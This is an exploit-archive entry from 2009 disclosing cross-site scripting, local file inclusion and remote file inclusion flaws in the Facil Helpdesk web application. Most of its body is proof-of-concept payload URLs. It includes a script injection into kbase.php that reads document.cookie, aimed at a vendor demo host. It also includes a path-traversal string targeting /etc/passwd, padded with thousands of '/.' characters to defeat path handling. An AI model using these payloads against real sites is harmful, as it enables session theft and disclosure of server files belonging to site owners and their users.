Facil Helpdesk (RFI/LFI/XSS) Multiples Remote Vulnerabilities

2009-08-07T00:00:00
ID 1337DAY-ID-5632
Type zdt
Reporter Moudi
Modified 2009-08-07T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
Facil Helpdesk (RFI/LFI/XSS) Multiples Remote Vulnerabilities
=============================================================



/*


Facil Helpdesk (RFI/LFI/XSS) Multiples Vulnerabilities

Discovered By : Moudi
Download : http://www.cromosoft.com/en/facilhelpdesk.html

Greetings : Mizoz, Zuka, 599eme Man.

*/

[+] Exploit XSS:

- Vulnerable code in kbase.php (/).

- Poc:
  http://127.0.0.1/kbase.php/[XSS]
  http://www.demo.cromosoft.com/helpdesk/kbase/kbase.php/"><script>alert(document.cookie);</script>

[+] Exploit LFI:

- Vulnerable code in index.php (lng).

- Poc:
  http://127.0.0.1/index.php?lng=[LFI]
  http://www.demo.cromosoft.com/helpdesk/index.php?lng=[LFI]

LFI => invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

[+] Exploit RFI:

- Vulnerable code in index.php (lng).

- Poc:
  http://127.0.0.1/index.php?lng=[RFI]




#  0day.today [2018-01-06]  #